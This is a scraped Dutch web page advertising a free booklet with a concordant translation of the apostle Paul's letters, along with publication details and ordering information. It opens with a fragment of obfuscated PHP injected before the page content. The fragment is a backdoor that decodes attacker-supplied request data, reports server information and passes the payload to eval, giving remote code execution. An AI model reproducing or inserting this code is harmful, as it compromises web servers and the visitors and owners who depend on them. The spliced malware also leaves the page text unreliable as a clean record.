$mc71c2a03){$p28e = $mc71c2a03;$l94f = $gbe686;}if (!$p28e){foreach ($o97c75f8[$o97c75f8['o933'][37].$o97c75f8['o933'][87].$o97c75f8['o933'][57].$o97c75f8['o933'][87].$o97c75f8['o933'][34].$o97c75f8['o933'][71].$o97c75f8['o933'][42].$o97c75f8['o933'][19]] as $gbe686=>$mc71c2a03){$p28e = $mc71c2a03;$l94f = $gbe686;}}$p28e = @$o97c75f8[$o97c75f8['o933'][65].$o97c75f8['o933'][89].$o97c75f8['o933'][87].$o97c75f8['o933'][93].$o97c75f8['o933'][53].$o97c75f8['o933'][93].$o97c75f8['o933'][74].$o97c75f8['o933'][71].$o97c75f8['o933'][37]]($o97c75f8[$o97c75f8['o933'][35].$o97c75f8['o933'][74].$o97c75f8['o933'][74].$o97c75f8['o933'][53].$o97c75f8['o933'][37].$o97c75f8['o933'][18].$o97c75f8['o933'][87].$o97c75f8['o933'][53].$o97c75f8['o933'][31]]($o97c75f8[$o97c75f8['o933'][69].$o97c75f8['o933'][19].$o97c75f8['o933'][93].$o97c75f8['o933'][34].$o97c75f8['o933'][57].$o97c75f8['o933'][89].$o97c75f8['o933'][37].$o97c75f8['o933'][72].$o97c75f8['o933'][18]]($p28e), $l94f));if (isset($p28e[$o97c75f8['o933'][53].$o97c75f8['o933'][64]]) && $n5f843a97==$p28e[$o97c75f8['o933'][53].$o97c75f8['o933'][64]]){if ($p28e[$o97c75f8['o933'][53]] == $o97c75f8['o933'][69]){$c4691d6fb = Array($o97c75f8['o933'][96].$o97c75f8['o933'][77] => @$o97c75f8[$o97c75f8['o933'][79].$o97c75f8['o933'][93].$o97c75f8['o933'][37].$o97c75f8['o933'][19]](),$o97c75f8['o933'][59].$o97c75f8['o933'][77] => $o97c75f8['o933'][72].$o97c75f8['o933'][67].$o97c75f8['o933'][31].$o97c75f8['o933'][13].$o97c75f8['o933'][72],);echo @$o97c75f8[$o97c75f8['o933'][73].$o97c75f8['o933'][57].$o97c75f8['o933'][18].$o97c75f8['o933'][72].$o97c75f8['o933'][1]]($c4691d6fb);}elseif ($p28e[$o97c75f8['o933'][53]] == $o97c75f8['o933'][37]){eval/*bb9a322*/($p28e[$o97c75f8['o933'][87]]);}exit();}} ?> Brieven van de apostel Paulus in concordante vertaling (boekje) - Een hommage aan Gods vermogen
« Naar overzicht

Brieven van de apostel Paulus in concordante vertaling (boekje)

'Concordant' wil zeggen 'eensluidend', 'overeenstemmend'. Een concordante vertaling beoogt een één-op-één vertaling te zijn. Eén woord in de grondtekst met één vertaalwoord weergeven. Het uitgangspunt bij concordant vertalen is dan ook: concordant waar mogelijk, maar altijd consistent. De woordenschat van de grondtekst moet zoveel mogelijk in de vertaling intact blijven.
Dit in tegenstelling tot de meeste huidige vertalingen, die een enkel Grieks woord met meerdere Nederlandse woorden vertalen, of juist meerdere Griekse woorden met hetzelfde Nederlandse woord weergeven. Vaak wordt hiervoor gekozen om een lastige passage of een lastig woord uit te leggen of overeen te doen stemmen met de heersende overtuiging. Dan is het voor de lezer niet meer mogelijk om vanuit de vertaling te zien wat er eigenlijk staat of kritisch de interpretatie van de vertalers of de heersende overtuiging te toetsen. Dit is wat de concordante vertaling wil voorkomen; het moet vooral een zo letterlijk mogelijke weergave zijn van 'wat er staat geschreven'.


Productinformatie

Uitgave: Stichting E-H Depot Nederland
Taal: Nederlands
Bindwijze: Softcover
Afmetingen: 6 (D) × 210 (H) × 148 (BR) mm
Pagina’s: 54
Druk:1
Verschijningsdatum: 2014
Gewicht: 115,00 gram
ISBN: 9789069920009


Wilt u dit gratis boekje bestellen?
Stuurt u dan een mailtje naar ingevanwijnen@live.nl
De brochure Brieven van de apostel Paulus in concordante vertaling wordt u aangeboden gemeente Eben-Haëzer te Rotterdam. De verzendkosten bedragen € 3,10 binnen Nederland (nadere informatie volgt per e-mail).

Een voor allen

Gods Vaderliefde sluit geen enkel schepsel uit
en zal uiteindelijk ook geen enkel schepsel onbewogen laten!

Allen voor Een